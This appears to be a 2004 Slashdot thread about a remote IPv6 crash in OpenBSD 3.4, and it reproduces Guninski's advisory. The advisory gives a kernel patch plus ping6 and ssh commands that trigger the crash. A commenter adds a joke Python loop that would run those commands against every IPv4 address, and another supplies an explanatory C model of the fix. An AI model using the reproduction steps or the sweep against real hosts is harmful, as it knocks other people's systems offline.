Remotely Crash OpenBSD
*no comment* writes "If you are running OpenBSD on your IPv6 install, it might be time to upgrade to -current. (just kidding) There is, however, a way to crash OpenBSD 3.4 with a couple of simple IPv6 commands. Georgi Guninski found the problem. To quote Theo, 'it is just a crash.'" It is unknown if the bug could be used to execute arbitrary code, but it does require patching a Linux kernel (or rolling your own network stack) to exploit.
I think it's time to upgrade to windows.
I am defenseless. Use your button. Mod me down with all of your hatred.
Or can OpenBSD still boast "Only one remote hole in the default install, in more than 7 years!" ?
--
Society has traditionally always tried to find scapegoats for its problems. Well, here I am.
I'm thinking that if someone from Microsoft stated "It's just a crash" the editors here would be just a touch more sarcastic...
No, in order to perform an attack on an OpenBSD box with this vulnerability you need to patch a Linux Kernel or roll your own network stack.
Join moola.com, play games to earn money.
I believe that you must roll your own Linux kernel or network stack in order to send the (correct? bad?) commands that cause openBSD's crash to occur.
Open Your Mind. Open Your Source.
Actually you need to patch the linux kernel or write you own network stack to DO the remote attack against an OpenBSD box.
At least that's the way I read it.
chown -R us.
I know that the problem has been fixed in -current, but I run a production box that I refuse to bring up to -current. There's no patch or even a mention of this problem on the errata page.
What's a sane admin to do?
No, the ATTACKER has to patch their Linux kernel in order to attack you. So if I knew you were running OpenBSD and using IPv6 and knew your IP address, I could patch my kernel and then try to connect to your box, causing you to crash.
"People that quote themselves in their signatures bother me" - athakur999
They are saying that to exploit would require a patch to the Linux kernel.
I like your way better though!
You have to have a modified ipv6 stack in order to exploit this bug, not to fix it. I can remotely crash your ipv6 enabled openbsd if I modify my linux kernel. Capisce?
Remote openbsd crash with ip6, yet still openbsd much better than windows
Systems affected:
tested on openbsd 3.4
not clear about netbsd
freebsd not vulnerable
Risk: Medium
Date: 4 February 2004
Legal Notice:
This Advisory is Copyright (c) 2004 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission - this especially applies to
so called "vulnerabilities databases" and securityfocus, microsoft, cert
and mitre.
If you want to link to this content use the URL:
http://www.guninski.com/obsdmtu.html
Anything in this document may change without notice.
Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.
Description:
It is possible to remotely crash openbsd 3.4 if the host receives icmpv6
and there is a listening tcp port.
quoting de raadt: "it is just a crash."
remote crash which screws the kernel.
unknown whether this may be exploited for code execution.
Details:
The problem is triggered by setting small ipv6 mtu and then doing tcp
connect.
How to reproduce:
Patch linux kernel 2.4.24 net/ipv6/icmp.c
case ICMPV6_ECHO_REPLY:
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev);
then:
ping6 openbsd
ssh -6 openbsd
Workaround:
It is believed that openbsd current is not vulnerable.
netbsd current also seems to have related changes.
check:
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/net
http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/netin
Vendor status:
open, net and free bsd were notified Sun, 1 Feb 2004 16:35:56 +0200
Georgi Guninski
http://www.guninski.com
(On the other hand, as everybody knows, IE is an integral part of windows and could never work on Solaris, HP-UX or Mac OS, just as it would be impossible to create a Windows version without IE, like WinXP-PE)
Programming can be fun again. Film at 11.
However, I guess patching a BSD kernel should work as well :-)
The Tao of math: The numbers you can count are not the real numbers.
So if you patch YOUR kernel and/or roll YOUR own network stack, then you could be vulnerable to a remote attack.
No, your attacker has to patch his linux kernel or roll his own network stack in order to crash you. You don't have to do a thing. RTFS!
c++;
Great, now when I try and check the linked article and can't get there I am left wondering if it was Slashdotted or if someone crashed the servers using the exploit.
Hell, who knows, maybe this one is Google's fault too.
...my BSD is dying...
I'd rather have a box crashed than a box rooted. But maybe I'm just funny that way.
Now let's see ... what are the chances of finding both an OpenBSD server (an unpatched one at that) and IPv6 network in the same place? I think I'd better stick to plausible worries like lightning strikes, seatbelt failures, and choking to death on my turkey dinners.
I was talking with some of my colleagues in network security this morning about the OpenBSD exploit and means by which future exploits may be avoided. One suggestion which was raised was that the OpenBSD 'ports' system may be to blame. After all, if you need to add packages on a BSD system, 'ports' must be opened, and when ports are open on firewall boxes, bad things happen. Debian's apt-get system for example does not require 'ports' to work properly, and therefore may be immune from this type of exploit. Is this a possible solution? I look forward to hearing the community's responses!
You appear to be missing the whole problem.
This is a problem with OpenBSD's IPv6 implementation where if you send bad data, it looks like sending something larger than expected, then the kernel will crap out on you.
Rolling your own kernel OR building your own network stack is what's required for the REMOTE host to send these bad packets to your system and crash it.
On an unrelated note, it's a little disturbing to see this as I just rebooted an OBSD 3.3 system to upgrade to 3.4, but then again, I don't run IPv6.
What I would say is most suspect is Theo's reaction "It's just a crash." You would hope someone who started a project to create the world's most secure OS would actually care there might be a problem.
"I use a Mac because I'm just better than you are."
No, the BSD has to patch the ATTACKERS IPv6 to crash THE packet linux victim ROLL YOUR OWN!
regarding the second paragraph...YOU HAVE TO BE KIDDING!
I would mod this FUNNY...not insightful.
kay, give us the IP address of your BSD box while I patch my Linux kernel.
the difference is they fix it in a timely fashion...
Kyle
http://www.unlogikal.net/
Ha ha ha, very funny.
Slashdot: Failed Car Analogies. Amateur Lawyering. Anecdote Battles.
Well, I guess Theo got hit by the reductionism bug...or perhaps what he means is "At least the system goes down rather than being compromised"
There are days on this network where I wish the latest MS vulnerability was just a crash. 'member those great days? It may not even get reported because it would be such low key news.
Anyway, for this remote takedown to work, you also have to be running an IPV6 stack, right? At the moment that's a pretty small segment of techies.
Note: I am not an OpenBSD apologist... I am a Mac apologist.
-- The unsig...
(Moderators: The BSD ports system has slightly less than nothing to do with TCP/IP ports being open, closed or missing on firewall or other machines. It's just a homonym (no, it has absolutely nothing to do with gays).)
Money for nothing, pix for free
After all, who needs a bug to d0s someone from the face of the earth?
/.
Exactly. All it takes is a fractal on the Google homepage or a link from
Cheers
Stor
"Yeah well there's a lot of stuff that should be, but isn't"
Hey but is only a crash nothing at all to worry about...
/* we coulnd't care less */ //joro
Patch linux kernel 2.4.24 net/ipv6/icmp.c
case ICMPV6_ECHO_REPLY:
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev);
then:
ping6 openbsd
ssh -6 openbsd
#!/usr/bin/python
import subprocess

def cmd_execute(cmd):
    # run a shell command and return its stripped output
    p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
    out, _ = p.communicate()
    return out.decode().strip()

#kill everybody (the joke: IPv4 dotted quads fed to the IPv6 tools)
for a in range(0, 256):
    for b in range(0, 256):
        for c in range(0, 256):
            for d in range(0, 256):
                host = '%d.%d.%d.%d' % (a, b, c, d)
                cmd_execute('ping6 ' + host)
                cmd_execute('ssh -6 ' + host)
OK, that just piqued my curiosity. I am very sorry it did, but it did. People, do NOT follow that link in the grandparent post. Just take my word for it. Don't. No amount of curiosity is worth seeing that.
Money for nothing, pix for free
good thing nobody uses IPv6 and never will! :-)
Not long ago there was an article about not only how ipv6 isn't needed, but that since it's 'new' code, it has a lot of problems that have long since been worked out of ipv4. Is this an example of that? Should we worry?
I have to ask myself that with all of the decades of experience that has gone into ipv4 development and hacking and exploiting, are these fears justified? Have all the glitches in ipv4 been found? and if so isn't it trivial to avoid the same early mistakes in ipv6. Does this particular problem have an ipv4 analog? Is it even a stack theory issue? Is it just an implementation oversight?
Does anyone have any insight?
He was talking about having to modify a linux kernel in order to generate the traffic to crash the BSD kernel...
Thinking outside my Head
I think what he means is "it's just a crash right now, don't bother me until you can show an exploit and have fixed it." It says right in the article they don't know if it will allow a system to be compromised, and it seems that until someone else checks that, he doesn't care. I was just saying that a crash might not be a crash, but Theo's attitude is a little lax in approaching the situation considering that they say right on bootup to OpenBSD the PROACTIVELY secure unix system. Not all that proactive when you don't take action to actually prevent a problem and just wait for someone to give you step-by-step how to compromise a system.
"I use a Mac because I'm just better than you are."
What am I missing here?
Enough good sense to RTFA, or at least properly fake as though you had.
LK
"Hi. This is my friend, Jack Shit, and you don't know him." - Lord Kano
mod -1 for being a troll post, openBSD is alive and well... and its not the linux kernel, its the BSD kernel you dumbshit.
Maybe you don't understand, but there has to be an attacker. You have to have a specific modification in the linux kernel of the linux machine (attacking machine) to successfully attack the openbsd machine (victim). Probably you could set up a FreeBSD machine, or even another OpenBSD machine to do the attack. Just a linux machine was used to attack in the example.
Did you even RTFA?
What would you rather Theo say? "OMG OMG OMG!!! It's a CRASH!!! Oh dear god! Quick, run around like headless chickens!!!!! Someone better get this patched pronto!!" or "It's just a crash." and get on with the patching?
Seriously, its getting fixed. You think his reaction would change the pace with which the bug gets fixed?
Ok so why the hell don't they just add a few more octets onto an ipv4 address? afraid to rewrite a.b.c.d as a.b.c.d.e.f?
lol... I crack me up
No. They use very different kernels, though a lot of code is shared among them.
So maybe you need to patch a Linux OS to get some help sending broken ICMPv6 packets, or maybe you just need to do creative writing to the Ethernet. But you could certainly get MS-DOS to let you do it, and presumably also Windows.
Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
And buffer overflows that get data that isn't crafted are "just a crash" as well.
But they are "securitier than thou." You're pretty much asking them to change their focus, do you think that security is a bad goal?
Maybe you need to get out of this sports mentality and stop feeling inadequate when another "team" is doing better in one area than your favorite?
It's fine to have security as your focus. In fact, that's great. What turns me off is the attitude that OpenBSD is axiomatically more secure. The response from TdR shouldn't be "it's just a crash." It should be, "Man, we screwed up! It will be fixed right away. Good thing there seems to be no way to execute code." And then they should look at how this bug got in there, and figure out how they can make sure that kind of bug doesn't happen again.
IMO they should also get rid of this ridiculous "no (well, one) (remote) (root-privilege) holes (in the default install) in the last 7 years!" business. It's just too confrontational; how can we help but think of them as another "team" trying to beat us at the security "sport"?
Fwiw, I wouldn't go into riot mode over four monosyllable words taken out of context be it from MS or OBSD. Of course, this is /. and that nice little blurb will most certainly cause a lot of banner hits as people will just have to comment. I can personally attest to 3 to get this post up.
I don't want knowledge. I want certainty. - Law, David Bowie
Dear lord...
Are you making use of IPV6? While it is possible I don't really know many people that are, so perhaps you could just not use the IPV6 bindings for now until the problem blows over?
::1
There you go. Have fun.
A non-serious cracker might have fun taking down OpenBSD a few times with an exploit like this. A more serious cracker would do this to try to convince some number of systems to stop running the most secure OS that's reasonably available and replace it with more vulnerable systems that aren't getting spanked a lot.
Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
I'd find the OpenBSD crew's haughty "more secure than thou" attitude a lot more annoying if it weren't for the fact that their track record actually justifies it. The fact that you can still count the number of remote exploits using a two-bit register is pretty impressive.
After all, who needs a bug to d0s someone from the face of the earth?
I dunno, man, winnuke was a big problem on our campus in 98(?). It's so much easier to crawl through a block of IPs sending a few packets than to DOS the whole netblock. You can even do it from a modem in a few minutes.
Hardly..
a simple raw socket will do.
The response from TdR shouldn't be "it's just a crash." It should be, "Man, we screwed up! It will be fixed right away. Good thing there seems to be no way to execute code."
It was fixed before you even heard about it. Get over yourself.
Haida Manga
Except it's not an exploit, it's a DoS ... and it's only a problem for those running IPv6 with a publicly accessible IPv6 address.
Yeah, there's a dangerous problem there.
God, the intelligence on Slashdot has certainly dropped in the past few years.
...IPv10 (IPX!)? 4 + 6... [woo lame version # advancement schemes!] then you get to put an "X" in the name and everyone upgrades faster... maybe we could even work in an XML basis; think of the interoperability!
Global symbol "$deity" requires explicit package name at line 2. - If only $scripture started "use strict;"
a few months back child porn was posted and nothing was done
I've read a bunch of posts comparing this "possible" hole in OpenBSD to those in MS. There's NO comparison! I bet Theo and the OpenBSD developers are already working on a fix. Actually, they probably already have one. With MS, it takes much, much longer! And sometimes, the "fixes" that MS so-called developers come up with break something else.
yes, when I saw this and noticed people commenting on the "Securer than thou" stance taken, my immediate thought was
"Hmm, well if we have gotten to the point where people have to roll their own net stack or patch a kernel to bring an issue to the fore, then hasn't the OpenBSD project succeeded in its goal?"
I'm glad they fixed it..
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet6/ip6_output.c.diff?r1=1.81&r2=1.82&f=h
http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/netinet/tcp_output.c.diff?r1=1.106&r2=1.107&sortby=date&f=h
[alk]
The good thing about ports is that, due to their alcohol and tannin content, you *CAN* leave them open much longer than more typical wines. I have a nice port (Fonseca) sitting open on my bar at home. I take a couple of nips from it every evening, and then replace the glass stopper on the carafe. It is a wonderful way to end the work-day. Go grab yourself a 10-year Tawny and you'll see what I mean.
You do need to be careful with how many ports you have open. I find after a couple of ports my work product increases. After a few more, it tends to decrease, exponentially going downhill with each subsequent port. You need to be especially careful with a root prompt and several open ports late at night.
For extra kicks, blind taste a Tawny against a Madeira.
Enjoy.
I have something in common with Stephen Hawking...
I have made a mirror of the page, as it is becoming exceedingly slow.
|/usr/games/fortune
My ip address is 127.0.0.1. Knock yourself out.
It's Linux, damnit! Pay no attention to renaming attempts by self-aggrandizing blowhards.
now, how many times does this happens to your favorite OS vendor and their favorite web browser???
from the openbsd CVS:
Revision 1.82 / (download) - annotate - [selected], Wed Feb 4 08:47:41 2004 UTC (38 hours, 50 minutes ago) by itojun
Branch: MAIN
CVS Tags: HEAD
Changes since 1.81: +100 -18 lines
Diff to previous 1.81 (colored)
strictly follow RFC2460 section 5, last paragraph (sender behavior when path MTU 1280). bug found by Georgi Guninski. ok dhartmei
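Neither the advisory's "How to reproduce" steps above (a patched Linux kernel answering every Echo Reply with a Packet Too Big reporting MTU 68, then a TCP connect) nor this CVS log line shows the rule the fix enforces, so here is an added stand-alone model of it. This is example code written for this page, not OpenBSD's ip6_output.c or tcp_output.c and not Guninski's Linux patch: RFC 2460 section 5, last paragraph, says a node must never size packets below the 1280-octet IPv6 minimum even when a router reports a smaller MTU; it keeps sending 1280-octet packets and adds a Fragment header to each. The ICMPv6 bytes are constructed for the example (checksum not verified), the constants and function names (pmtu_update_naive, pmtu_update_rfc2460, tcp_mss_from_pmtu, ip6_fragment_count) are the example's own, and the exact code path that panicked 3.4 is not claimed here.

```c
/*
 * Added example: a stand-alone model of how an IPv6 sender should treat an
 * ICMPv6 Packet Too Big report, per RFC 2460 section 5, last paragraph.
 * This is NOT OpenBSD's ip6_output.c/tcp_output.c and NOT Guninski's Linux
 * patch; all names, constants and the packet bytes are this example's own.
 */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define IPV6_MINMTU           1280u  /* RFC 2460 s.5: minimum link MTU */
#define ICMP6_PACKET_TOO_BIG  2      /* RFC 4443 s.3.2 message type */
#define IPV6_HDR_LEN          40u
#define IPV6_FRAG_HDR_LEN     8u
#define TCP_HDR_LEN           20u

struct path_mtu {
    uint32_t mtu;           /* MTU the sender sizes packets to */
    int      need_frag_hdr; /* 1 = add a Fragment header (reported MTU < 1280) */
};

/* Constructed ICMPv6 Packet Too Big message reporting MTU 68, the value the
 * advisory's Linux patch injects: type=2 code=0 checksum=0 MTU=0x00000044,
 * followed by the first bytes of the "invoking" packet. The checksum is not
 * verified in this model. */
static const uint8_t sample_ptb[] = {
    0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44,
    0x60, 0x00, 0x00, 0x00, 0x00, 0x14, 0x06, 0x40
};

/* Return the MTU carried by a Packet Too Big message, or 0 if it is not one
 * (RFC 4443 s.3.2: type(1) code(1) checksum(2) MTU(4, network order)). */
static uint32_t icmp6_ptb_mtu(const uint8_t *msg, size_t len)
{
    if (len < 8 || msg[0] != ICMP6_PACKET_TOO_BIG)
        return 0;
    return ((uint32_t)msg[4] << 24) | ((uint32_t)msg[5] << 16) |
           ((uint32_t)msg[6] << 8)  |  (uint32_t)msg[7];
}

/* Naive policy: believe the router and shrink the path MTU to whatever it said. */
static void pmtu_update_naive(struct path_mtu *pm, uint32_t reported)
{
    pm->mtu = reported;
    pm->need_frag_hdr = 0;
}

/* RFC 2460 s.5 policy: never go below 1280; if the report is smaller, keep
 * sending 1280-octet packets but put a Fragment header in each of them. */
static void pmtu_update_rfc2460(struct path_mtu *pm, uint32_t reported)
{
    if (reported < IPV6_MINMTU) {
        pm->mtu = IPV6_MINMTU;
        pm->need_frag_hdr = 1;
    } else {
        pm->mtu = reported;
        pm->need_frag_hdr = 0;
    }
}

/* TCP payload per segment that fits in one packet of pm->mtu octets. A value
 * below 1 means the headers alone overflow the MTU; a sender must refuse such
 * a value rather than carry it into its segment-size arithmetic. */
static int tcp_mss_from_pmtu(const struct path_mtu *pm)
{
    uint32_t overhead = IPV6_HDR_LEN + TCP_HDR_LEN +
                        (pm->need_frag_hdr ? IPV6_FRAG_HDR_LEN : 0);
    return (int)pm->mtu - (int)overhead;
}

/* Fragments needed to send `payload` octets (data after the IPv6 header) at
 * the given MTU. Fragment data must be a multiple of 8 octets; returns 0 when
 * the MTU leaves no room for even one 8-octet block. */
static unsigned ip6_fragment_count(uint32_t mtu, uint32_t payload)
{
    if (mtu <= IPV6_HDR_LEN + IPV6_FRAG_HDR_LEN)
        return 0;
    uint32_t per_frag = (mtu - IPV6_HDR_LEN - IPV6_FRAG_HDR_LEN) & ~7u;
    if (per_frag < 8)
        return 0;
    return (payload + per_frag - 1) / per_frag;
}

/* Convenience: reported MTU -> TCP MSS under each policy. */
static int mss_naive(uint32_t reported)
{
    struct path_mtu pm;
    pmtu_update_naive(&pm, reported);
    return tcp_mss_from_pmtu(&pm);
}

static int mss_rfc2460(uint32_t reported)
{
    struct path_mtu pm;
    pmtu_update_rfc2460(&pm, reported);
    return tcp_mss_from_pmtu(&pm);
}

int main(void)
{
    uint32_t reported = icmp6_ptb_mtu(sample_ptb, sizeof sample_ptb);
    printf("router reports MTU %u\n", reported);
    printf("naive   : mss=%d, fragments for 1400-byte payload=%u\n",
           mss_naive(reported), ip6_fragment_count(reported, 1400));
    printf("rfc2460 : mss=%d, fragments for 1400-byte payload=%u\n",
           mss_rfc2460(reported), ip6_fragment_count(IPV6_MINMTU, 1400));
    return 0;
}
```

Under the naive policy the 68-octet report becomes an 8-byte MSS and 88 fragments for a 1400-byte payload, and a report of 40 drives the MSS negative, exactly the kind of value a sender must never feed into its segment-size arithmetic. Under the RFC policy the MSS is 1212 and the payload takes two fragments no matter how small the reported MTU is, because the sender only ever honours reports of 1280 or more.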
This guy found a crash in qmail, too. I don't think he showed it was exploitable, so he doesn't win DJB's security guarantee prize. In fact I'm not sure DJB reacted to the news at all.
OpenBSD was branched from NetBSD well before IPv6 support came out. The kernels have diverged quite a lot since then. There is no enhanced risk for NetBSD. I doubt if other systems are vulnerable, just because of the fact that knowledge about security and DOS holes are shared pretty freely between the groups, and we haven't heard about FreeBSD or NetBSD.
you would HAVE to be connected to the 6bone to get an ipv6 packet. Or have the attacker on your own network running ipv6 and trick you into becoming configured onto the same /64 prefix....not many of us have an ipv6 tunnel (thank you hurricane electric). So this affects very very very few people. you know who you are, and are patching now.
--jboss
The posters point is taken though... IMHO Theo is an ass. I was in no way surprised when the funding they were promised was pulled moments before it was to be paid. He honestly seems to go out of his way to make people feel bad, and himself feel better.
...
A coworker of mine was "graced" with a personal email from Theo, in which he complained that adding new features to kernels was a "stupid new meme" without actually having read the email about what my coworker was doing.
Although I do run Openbsd... I attribute its quality to the dedicated coders who work relentlessly to find little tiny holes.
The day Microsoft has half the kind of security track record as OpenBSD, they'll be cut some slack.
OpenBSD had earned a little slack. MS still has a long way to go in system security/stability before they deserve the same treatment.
Fixed? really? Could you point out on the errata page where this is even mentioned, let alone patched?
"I use a Mac because I'm just better than you are."
"our linux crashed your openbsd!"
If you think of going to page linked by the grand-grand-parent, dont.
... sigh, why do I even make the effort?)
I did out of curiosity
If your curious, read this
DISCLAIMER : Even the text version might be highly offensive to some, but I hope that this will kill the curiosity of some people.
The link is one large image composed by multiple sub-images, there is (ROT13):
- Ghotvey
- Tbngfr
- fbzr fgenatr irel htyl intvan-vasrpgvba
- n guvat gung ybbxf yvxr n urnq ghearq vafvqr bhg
- n yrt jvgu gur fxva evccrq bss
- n navzr cvpgher bs n tvey jvgu na bcra fgbznpu
- guerr irel byq zra univat frk
- n jbzna rngvat cbbc pbzvat serfu bhg bs fbzrbarf nffubyr
- one more picture I don't remember (and I WON'T go there again, once was twice too much)
And I can just agree with the parent
NO AMOUNT OF CURIOSITY IS WORTH SEEING THAT.
(But I know that your curiosity will win anyway
Now, where can I get a mind-altering drug to forget what I just saw, that I just saw it and that I even remotly know of it existence?
I have discovered a truly remarkable proof for my post which this sig is too small to contain.
While possibly not a direct security threat, remote crash exploits are obviously highly disruptive and in today's networked economy, highly costly in terms of lost productivity.
While a crash exploit doesn't guarantee it, it usually means that a root exploit is possible.
Think about it: You got the machine to execute code it shouldn't have executed (or overwrite something 'way important it shouldn't have overwritten, or with a value it shouldn't have written.) This usually means you changed the program counter to some random value. That typically happens as a result of overwriting a return address by a buffer-in-the-stack overflow. Now if you can just get the program counter to point to code you supplied in the same packet, and put the right code there, you're in.
There are other ways this can happen (for instance: overwriting an index into a function table with an illegal value). But many of these similarly lead to root exploits.
A crash means you killed, not just a task, but the whole system. In a system as robust as BSD this usually means that the code that was corrupted by the exploit was running at a kernel permission level. So if you can take it over you can get it to give you any permission you want.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
What does "cogitoergosum" mean?
I remember the days in the late 80s and early 90s when it was (which is how I was able to afford that case of Fonseca '77)... I was a pig in shit back then.
I have something in common with Stephen Hawking...
It should be amusing and rare to hear about these holes in ANY OS. OpenBSD should get more press than Windows for holes, after all openBSD has so few that you can safely assume the people using openBSD don't bother to pay attention, while those using Windows have to pay attention. Therefore we need extra effort to get the attention of OpenBSD users on the rare times it is needed.
Sadly it doesn't work that way. Windows users despite having lots (by comparison) of holes never patch, while openBSD seems to be reserved for only the paranoid who patch often.
Either way, openBSD deserves the attention they get. If I were to swear everyone who knows me would talk about it, even though most of them think nothing of swearing everyday (or so it seems). Once you build (like me) an expectation it is interesting when you violate it, even though you did something that is everyday.
First of all it's CowboyNeal.
Secondly, there's nothing wrong with his statement. In order to exploit the bug, you need to be running a patched Linux kernel to send the necessary packet.
Remote desktop on Linux? Uh, sure.
Wow! You've got a ton of porn on there!
What crackpipe have you been using? It must greatly enhance the smoking experience. The funding was not pulled "pulled moments before it was to be paid," the funds were already greatly used. There was about three months left before the funding from POSSE was ended. Theo does not seem like an ass to me, he does instead seem like someone that dismisses stupid shit that random people say because he has better things to do.
I'm sick of following my dreams - I'm just going to ask them where they're going and hook up with them later.
I thought Theo's comment sounded really arrogant, too. But you might note that the author quoted it with no context, so who knows whether it was in real life.
Now as for Microsoft, if MS patched something within... no, wait, it was patched before the bug came out... anyway, we'd cut them a bit more slack.
I hereby place the above post in the public domain.
We are still running everything on ipv6. Now we have had a couple sites that we've had to move to FreeBSD servers due to the lack of SMP support in OpenBSD and needed the extra power. However, overall, I've had good luck with OpenBSD. Its the lack of support for SMP and other features that keep me from an extremely large scale deployment...
"The problem with socialism is eventually you run out of other people's money" - Thatcher.
To quote Theo, 'it is just a wardrobe malfunction.'"
Cogito ergo sum:
Rene Descartes, Discourse on Method, Part 4
Reposted 'cause I could use the mod points.
What does "cogitoergosum" mean?
Cogito ergo sum:
Rene Descartes, Discourse on Method, Part 4
A "remote hole" doesn't have to just be obtaining root access. Being able to remotely crash a server is almost as bad. So no, they cannot boast.
Troll?!? It was humor, you insensitive clod.
You got us. It was fixed about two and a half hours after you heard about it...
http://bsd.slashdot.org/comments.pl?sid=95689&op=Reply&threshold=1&commentsort=0&tid=172&mode=thread&pid=8196065
What I've been wondering is if anyone has read any of the literature regarding OpenBSD's methodology. I recall it being expressly mentioned that they would rather have the machine crash than have it rooted. Which is a good idea if you cannot risk a break-in. They try to break-in, you crash, and now you're in a more secure state (off) than you were when they attacked you.
As a sysadmin of a college network, "just a crash" *really* helped me.
I replaced all firewalls with OpenBSD filtering bridges. One rather persistent script kiddie (unfortunately a legitimate $luser on the network) decided to send a few malformed packets here, there and everywhere. One of these crashed the filtering bridge at the edge of that particular subnet.
Immediately no packets enter or leave that subnet and I get about 40 phone calls "the internet is broken / my session crashed..." and go and deal with it.
Just a crash, saved several boxes. By contrast, accessible linux machines, privilege escalation - root exploit. All over.
Now if only the average windows box would *only* bluescreen in response to being cracked/ infection with the latest...rather than sending mal packets everywhere. Then infection would be self limiting and the world would be a better place.
Well, I didn't do my homework, you are right that the POSSE money wasn't all pulled suddenly. I do recall reading some stories that seemed to phrase it that way on the internet, perhaps I misread.
:D
I do stand by my statement though... (concerning the assholitude).
was your firewall would you rather have it rooted and used by one person/group or your box down and either:
internal network exposed, or
your business off the air
The Singularity is closer than you think
Quant
and if you're counting the number of remote root exploits, you can use a 2 bit register with a signed value.
When someone might yell at me, it has to be OpenBSD.
a complete clean room implementation using engineers that didn't read BSD TCP/IP code in school ...
...
yeah right
Wasn't the BSOD just a crash?
[SIG] Remember Mattel handheld games?
"very easily executed DOS" = finding ipv6 obsd box and the ability to send ipv6 packets to said box. right?
vodka, straight up, thank you!
Basically, Georgi Guninski found a way to cause the current child process of 'qmail-smtpd' to abend -- this is not a DoS, as it only affects your child SMTP session, and is likely not possible in an RFC-compliant message.
Technically the issue is the use of a signed integer as a counter when it is also used as an index into the array (containing the current line?). If the counter is incremented to the point that it "wraps around" (technically overflows, but not in the same sense as a buffer overflow), then when the counter is used as an offset into an array, it causes a "segment violation" fault.
Because the counter is used as an offset into an array for the purpose of reading the value of a byte, and the process is killed as soon as it tries to access memory outside of its segment (SEGV), this is inherently non-exploitable for privilege escalation.
As I said, it's silly, is only an issue because the rest of DJB's code is so clean you could eat off it, and as Georgi Guninski says,
I do not deploy Linux. Ever.
Heres what I saw in the advisory:
ping6 openbsd
ssh -6 openbsd
Notice the ssh -6? Now how many people do you know will run an ssh server as tcp6? He will have to be really interested in ipv6 and run a couple of daemons and run an ipv6 home network.
So if he's mucking with ipv6, for one he's not running critical servers and has critical data on his server that needs to be 99.999% available.
Secondly there's really not many people who would muck with ipv6 in the first place.
So I think OBSD is still pretty much secure and this bug shouldn't harm OBSD's image. Bugs appear in OSes all the time and this one, with all the press it's getting will do much less damage to OBSD servers around than the bugs for Windows and other Unixen will.
"Give orange me give eat orange me eat orange give me eat orange give me you." -Nim Chimpsky
Dude relax. Think about it, lots of machines have IPv6 running now. What there are NOT a lot of are IPv6 enabled routers. Forilla, if the packets can't get to your boxen, they can cause your boxen undue grief. How many IPv6 enabled routers do YOU have leading to your networks?
It's not a good thing that this happened... but theo is not incorrect in being a bit dismissive of the exploit.
Given your zealousness you probably don't use OpenBSD. If that's the case then you're one less system to patch.
0p3|/| 8$D 1Z L33T
However, keep in mind that there are quite a few areas in (all?) BSD-derived IP stacks where a seriously malformed packet will cause the kernel itself to throw up its hands and call panic("WTF?!?").
I've found that just about any system will eventually panic if you sic ISIC at it from within the same subnet.
Cool OpenBSD kernel panic messages:
or the elegantly simple:
I do not deploy Linux. Ever.
Ummm... I'd be more worried the author quoted him out of context if Theo didn't come off as obnoxious.
I have a modifier to add six points for troll posts, so this actually gets *modded up* to five points on my computer. And at least you got what you asked for. A lot of people think they're trolling and ask for a troll mod, but they get flamebait. Dumbasses.
Yeah, you're not going to see a worm that infects Linux hosts, patches their kernels, recompiles, and executes these commands against OpenBSD.org...
I get it now. We leave. You guard the prince. The prince has to patch his kernel.
graspee
Just use VPN through it and it comes down with the slightest traffic between the VPN server and client
"Fighting terrorists with military might is like killing a mosquito on your Dad's forehead with a rifle."
I think that it means that you need a patched Linux kernel in order to generate and send the borked packets that cause the crash on an OpenBSD box. The modded network stack is used on a Linux machine to crash an OpenBSD machine.
I beg to differ.
// hdw
Removing unused features/services/functions does add to your overall security and system stability.
If you don't use IPv6 then taking it out of your kernel is a good move.
But I agree to a point, just rampaging thru your kernel config removing fluff isn't security.
Done in a sane way it's an addition to security and stability.
Executive Pope (small) Kallisti Engineering
I'm surprised the crash made slashdot, but not the root exploit in BSD that was posted to BugTraq at the same time. To wit:
http://www.securityfocus.com/archive/1/352733
The response from TdR shouldn't be
Ok, tell me *WHY* it should be any different. And when you have figured out one or more reasons why it should be anything different, match those reasons to the list here:
http://www.openbsd.org/goals.html
If you get any matches, please post them here afterwards.
It is not the goal to conquer all unices, nor to please you or me or any other users. Neither is it a goal to produce comments that can't be misinterpreted out of context either. So what if Theo is an asshole, so what if he is blunt, uncharismatic, unfriendly or not on your list of likeable persons? He doesn't care for what you like, until you start producing workable code. And neither do I, but I don't run a project like that. He does. And he can say what goes and what doesn't. You (and others) need to figure out really quickly that it's not about you. They don't do all that work for you, it's for _them_.
It may come as a shock for you to realise it, but if you slam the door and never return it won't matter to them. Really. If the (true - as of now) statement offends you so much, by all means go somewhere else. It will not matter. It will not change any facts, and it will not change openbsd, and it will not change the track record of openbsd.
-- I'm as unique as everyone else.
What, writing raw ethernet packets won't work?
What about raw sockets?
Now the specialist press, including web sites, who know of the existence of OpenBSD, are likely to treat this in much the same way. A BSD crash, any variant, is a rarity, 1000 times or more less likely to happen than a BSOD. Same sort of ratio for security holes also. So, the same thing happens, the uncommon major event gets the attention, although it does far, far less harm overall than the very common everyday event.
Of course in this case the normal press remain in utter ignorance, some of them may know that Windoze is not the same as a MAC, a few will know of Linux, and very few indeed will know what BSD is, they probably think it is a shorter abbreviation for BSOD. So, the mainstream press will leave this well alone.
It is quite right and proper that crashes should be reported, and certainly it is only fair that a problem with a secure OS gets to be known, and fixed, but like the train crash, it needs to be kept in perspective.
